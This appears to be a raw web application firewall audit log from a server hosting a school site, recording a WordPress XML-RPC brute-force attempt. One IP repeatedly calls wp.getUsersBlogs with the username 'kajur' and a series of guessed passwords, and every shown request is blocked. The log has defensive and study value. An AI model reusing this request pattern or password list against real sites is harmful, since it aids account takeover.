[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079389240559 4923 (- - -) Stopwatch2: 1745079389240559 4923; combined=3839, p1=441, p2=3221, p3=0, p4=0, p5=104, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ba16b33-Z-- --4f2de214-A-- [19/Apr/2025:23:17:36 +0700] aAPMoEruoUXZj665VUFxcQAAANg 103.236.140.4 35012 103.236.140.4 8181 --4f2de214-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4f2de214-C-- wp.getUsersBlogs kajur kajur@1987 --4f2de214-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f2de214-E-- --4f2de214-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079456025708 5280 (- - -) Stopwatch2: 1745079456025708 5280; combined=3722, p1=447, p2=3107, p3=0, p4=0, p5=99, sr=89, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f2de214-Z-- --4037f74a-A-- [19/Apr/2025:23:18:39 +0700] aAPM33Na4dA2HllpK_Pm7wAAAJc 103.236.140.4 35320 103.236.140.4 8181 --4037f74a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4037f74a-C-- wp.getUsersBlogs kajur marketing2024_ --4037f74a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4037f74a-E-- --4037f74a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079519373919 5322 (- - -) Stopwatch2: 1745079519373919 5322; combined=3804, p1=477, p2=3148, p3=0, p4=0, p5=104, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4037f74a-Z-- --400c857f-A-- [19/Apr/2025:23:19:41 +0700] aAPNHQ6cTFSgLAHl7PpN1gAAABM 103.236.140.4 35614 103.236.140.4 8181 --400c857f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --400c857f-C-- wp.getUsersBlogs kajur pwd123 --400c857f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --400c857f-E-- --400c857f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079581242593 5117 (- - -) Stopwatch2: 1745079581242593 5117; combined=3647, p1=441, p2=3030, p3=0, p4=0, p5=102, sr=88, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --400c857f-Z-- --ca900371-A-- [19/Apr/2025:23:20:42 +0700] aAPNWkruoUXZj665VUFxlwAAAMU 103.236.140.4 35906 103.236.140.4 8181 --ca900371-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ca900371-C-- wp.getUsersBlogs kajur scotland --ca900371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca900371-E-- --ca900371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079642402882 5294 (- - -) Stopwatch2: 1745079642402882 5294; combined=4182, p1=515, p2=3494, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca900371-Z-- --0355e725-A-- [19/Apr/2025:23:21:45 +0700] aAPNmQ6cTFSgLAHl7PpOBwAAAA0 103.236.140.4 36218 103.236.140.4 8181 --0355e725-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0355e725-C-- wp.getUsersBlogs kajur casper --0355e725-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0355e725-E-- --0355e725-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079705091405 5947 (- - -) Stopwatch2: 1745079705091405 5947; combined=4141, p1=535, p2=3415, p3=0, p4=0, p5=112, sr=93, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0355e725-Z-- --ced09e29-A-- [19/Apr/2025:23:22:47 +0700] aAPN1w6cTFSgLAHl7PpOGwAAAAM 103.236.140.4 36542 103.236.140.4 8181 --ced09e29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 234 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ced09e29-C-- wp.getUsersBlogs kajur smkn22-jkt-sch-id123456 --ced09e29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ced09e29-E-- --ced09e29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079767489612 4856 (- - -) Stopwatch2: 1745079767489612 4856; combined=3742, p1=435, p2=3126, p3=0, p4=0, p5=105, sr=86, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ced09e29-Z-- --6b96a53c-A-- [19/Apr/2025:23:23:53 +0700] aAPOGXNa4dA2HllpK_PnUgAAAJA 103.236.140.4 36860 103.236.140.4 8181 --6b96a53c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6b96a53c-C-- wp.getUsersBlogs kajur q1w2e3r4t5 --6b96a53c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b96a53c-E-- --6b96a53c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079833552261 5275 (- - -) Stopwatch2: 1745079833552261 5275; combined=3821, p1=446, p2=3139, p3=0, p4=0, p5=133, sr=88, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b96a53c-Z-- --c2fb2555-A-- [19/Apr/2025:23:25:00 +0700] aAPOXA6cTFSgLAHl7PpOWwAAABM 103.236.140.4 37202 103.236.140.4 8181 --c2fb2555-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c2fb2555-C-- wp.getUsersBlogs kajur Jessica --c2fb2555-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2fb2555-E-- --c2fb2555-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079900723218 5316 (- - -) Stopwatch2: 1745079900723218 5316; combined=3776, p1=449, p2=3131, p3=0, p4=0, p5=112, sr=87, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2fb2555-Z-- --8c5d5836-A-- [19/Apr/2025:23:26:00 +0700] aAPOmEruoUXZj665VUFyDgAAANc 103.236.140.4 37490 103.236.140.4 8181 --8c5d5836-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8c5d5836-C-- wp.getUsersBlogs kajur pa$$w0rd --8c5d5836-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c5d5836-E-- --8c5d5836-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079960457613 5163 (- - -) Stopwatch2: 1745079960457613 5163; combined=3658, p1=444, p2=3047, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c5d5836-Z-- --02c6b857-A-- [19/Apr/2025:23:27:00 +0700] aAPO1OvDiFC_ir7MDwZSVAAAAE4 103.236.140.4 37806 103.236.140.4 8181 --02c6b857-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --02c6b857-C-- wp.getUsersBlogs kajur adminmlg --02c6b857-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02c6b857-E-- --02c6b857-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080020840371 5348 (- - -) Stopwatch2: 1745080020840371 5348; combined=3754, p1=444, p2=3141, p3=0, p4=0, p5=99, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02c6b857-Z-- --7164e31b-A-- [19/Apr/2025:23:28:01 +0700] aAPPEQ6cTFSgLAHl7PpOowAAABA 103.236.140.4 38092 103.236.140.4 8181 --7164e31b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7164e31b-C-- wp.getUsersBlogs kajur 2003 --7164e31b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7164e31b-E-- --7164e31b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080081226401 4949 (- - -) Stopwatch2: 1745080081226401 4949; combined=3648, p1=449, p2=3020, p3=0, p4=0, p5=104, sr=88, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7164e31b-Z-- --abcc0a4c-A-- [19/Apr/2025:23:29:02 +0700] aAPPTuvDiFC_ir7MDwZSegAAAFU 103.236.140.4 38406 103.236.140.4 8181 --abcc0a4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --abcc0a4c-C-- wp.getUsersBlogs kajur public --abcc0a4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abcc0a4c-E-- --abcc0a4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080142523138 5384 (- - -) Stopwatch2: 1745080142523138 5384; combined=3771, p1=492, p2=3107, p3=0, p4=0, p5=102, sr=90, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abcc0a4c-Z-- --6558d804-A-- [19/Apr/2025:23:30:02 +0700] aAPPiuvDiFC_ir7MDwZSsAAAAFc 103.236.140.4 38720 103.236.140.4 8181 --6558d804-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6558d804-C-- wp.getUsersBlogs kajur xxxxx --6558d804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6558d804-E-- --6558d804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080202112277 3783 (- - -) Stopwatch2: 1745080202112277 3783; combined=2458, p1=322, p2=2011, p3=0, p4=0, p5=73, sr=59, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6558d804-Z-- --d01ac66b-A-- [19/Apr/2025:23:31:02 +0700] aAPPxuvDiFC_ir7MDwZSxgAAAFQ 103.236.140.4 39100 103.236.140.4 8181 --d01ac66b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d01ac66b-C-- wp.getUsersBlogs kajur baseball --d01ac66b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d01ac66b-E-- --d01ac66b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080262529185 5604 (- - -) Stopwatch2: 1745080262529185 5604; combined=3728, p1=489, p2=3085, p3=0, p4=0, p5=91, sr=82, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d01ac66b-Z-- --8e5edf4c-A-- [19/Apr/2025:23:31:05 +0700] aAPPyUruoUXZj665VUFyqgAAAMI 103.236.140.4 39122 103.236.140.4 8181 --8e5edf4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8e5edf4c-C-- wp.getUsersBlogs kajur 1234%^&* --8e5edf4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e5edf4c-E-- --8e5edf4c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080265360348 5862 (- - -) Stopwatch2: 1745080265360348 5862; combined=4058, p1=517, p2=3367, p3=0, p4=0, p5=105, sr=89, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e5edf4c-Z-- --436cb05b-A-- [19/Apr/2025:23:32:03 +0700] aAPQA-vDiFC_ir7MDwZS2QAAAEw 103.236.140.4 39426 103.236.140.4 8181 --436cb05b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 